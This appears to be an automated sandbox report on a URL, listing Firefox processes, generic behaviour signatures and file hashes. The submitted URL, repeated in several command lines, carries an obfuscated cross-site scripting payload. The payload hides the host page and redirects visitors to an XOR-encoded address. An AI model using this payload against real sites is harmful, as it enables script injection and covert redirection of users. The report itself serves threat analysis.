Overview

overview

1

Static

static

1

URLScan

urlscan

1

http://kr.iofc.org/e...

windows10-2004-x64

1

http://kr.iofc.org/e...

windows11-21h2-x64

1

Analysis

  • max time kernel
    15s
  • max time network
    18s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 02:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://kr.iofc.org/error?msg=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3ElgJ%3DjRi%2Ck3gyg9%2BP%29FsMvf%3Dg%3C%29~%27m%3Cimg%20src%3D%22%3B%3ABpBKn%26%C3%97%2B%3DB%3DdPxNJTkN%3B%2B%2B%21He%2BR%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22e%C3%975%22%3E%2313pk.CjSw9%3DH.%3A%2Ar2ByE%2B__%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu

Score
1/10

Malware Config

Signatures

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://kr.iofc.org/error?msg=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3ElgJ%3DjRi%2Ck3gyg9%2BP%29FsMvf%3Dg%3C%29~%27m%3Cimg%20src%3D%22%3B%3ABpBKn%26%C3%97%2B%3DB%3DdPxNJTkN%3B%2B%2B%21He%2BR%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22e%C3%975%22%3E%2313pk.CjSw9%3DH.%3A%2Ar2ByE%2B__%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://kr.iofc.org/error?msg=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3ElgJ%3DjRi%2Ck3gyg9%2BP%29FsMvf%3Dg%3C%29~%27m%3Cimg%20src%3D%22%3B%3ABpBKn%26%C3%97%2B%3DB%3DdPxNJTkN%3B%2B%2B%21He%2BR%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22e%C3%975%22%3E%2313pk.CjSw9%3DH.%3A%2Ar2ByE%2B__%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C78%2C69%2C88%2C71%2C66%2C67%2C77%2C66%2C4%2C72%2C67%2C78%2C5%2C27%2C26%2C26%2C18%2C25%2C31%2C79%2C72%2C27%2C24%2C24%2C79%2C78%2C72%2C75%2C29%2C18%2C26%2C26%2C5%2C27%2C28%2C5%2C27%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.0.1656358199\1152192798" -parentBuildID 20230214051806 -prefsHandle 1736 -prefMapHandle 1728 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14dbce44-cd2e-4b4b-b37e-521ad85eb9fc} 436 "\\.\pipe\gecko-crash-server-pipe.436" 1816 1d88d510858 gpu
        3⤵
          PID:3172
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.1.1237528136\1530507693" -parentBuildID 20230214051806 -prefsHandle 2384 -prefMapHandle 2372 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a1ac8c9-3c0b-42c7-a37a-c3095eced1a5} 436 "\\.\pipe\gecko-crash-server-pipe.436" 2412 1d88089b958 socket
          3⤵
            PID:2620
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.2.964630211\2099213594" -childID 1 -isForBrowser -prefsHandle 2976 -prefMapHandle 2868 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88df5c34-ca23-42ed-9939-9021d7b428ff} 436 "\\.\pipe\gecko-crash-server-pipe.436" 2988 1d890564258 tab
            3⤵
              PID:3520
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.3.1564078149\756154440" -childID 2 -isForBrowser -prefsHandle 3292 -prefMapHandle 3404 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd139996-c953-468a-9599-47e0f93be4df} 436 "\\.\pipe\gecko-crash-server-pipe.436" 3508 1d89200b458 tab
              3⤵
                PID:4256
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.4.1952938245\1596700469" -childID 3 -isForBrowser -prefsHandle 5060 -prefMapHandle 5056 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de834650-7061-4733-adf6-4bbc14d9e712} 436 "\\.\pipe\gecko-crash-server-pipe.436" 5068 1d893582858 tab
                3⤵
                  PID:1988
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.5.1975534028\376576177" -childID 4 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {405f2d08-18c1-4a55-bba2-6a920611ae2e} 436 "\\.\pipe\gecko-crash-server-pipe.436" 5200 1d8938e0b58 tab
                  3⤵
                    PID:1684
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="436.6.1686172806\1182788095" -childID 5 -isForBrowser -prefsHandle 5396 -prefMapHandle 5400 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1276 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6da664df-02fc-40a1-963d-c79cacd17a36} 436 "\\.\pipe\gecko-crash-server-pipe.436" 5480 1d8938e3558 tab
                    3⤵
                      PID:4832

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\47kntzet.default-release\activity-stream.discovery_stream.json.tmp
                  Filesize

                  23KB

                  MD5

                  db0ad8c6113ceb58ae015772618268d7

                  SHA1

                  222fc55c75af76985157d1c4a6ddc0c570c3f1a0

                  SHA256

                  7749f08c950263f72558b368ca90a2965ed73d8ec7c2bd53f702b7f571e1a890

                  SHA512

                  d816f099d38a032f30ba9264f9a93c337a82bd90c44026ef114356f1c09f400906c7e267e659008469a05cb88b852c833f23fd8dfce540aaa955768ce4e899b6

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\47kntzet.default-release\prefs.js
                  Filesize

                  6KB

                  MD5

                  c81a47e12c5bc720b629fd2f4f794413

                  SHA1

                  f2cc26e24c1936e85b98c8b123a851809318be3f

                  SHA256

                  fbd9967742567f453adcd9117584b0fb98a9d1f3ee55e8adc7f25f40dff2c548

                  SHA512

                  ef30bd1b943d531682a38a7ef3dcbf7e630a08120f21342b84d2a91732f7c8ec095f569b98e33e5afb1ae0d16d2a61c85b3dd2ecd042252a4d7e37e2db1fcf36

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\47kntzet.default-release\prefs.js
                  Filesize

                  6KB

                  MD5

                  115a985f81e8e7d2e951ebf88a160574

                  SHA1

                  2db7312fef3d6bb40895357c904dc9e5814543ff

                  SHA256

                  73b30737f4e8ab40c366ace6d4149f9b97b17ac7ede570cfb7965dfc62b24ab7

                  SHA512

                  0587ee3a51911d2b95c91732fb7624496e5bdcc2ee3a090c21b8133a98c192b10e62f44a8e132535acc2117e62cc3a39d88178986b42999d89a4b25b54dc8cea

                  Download Submit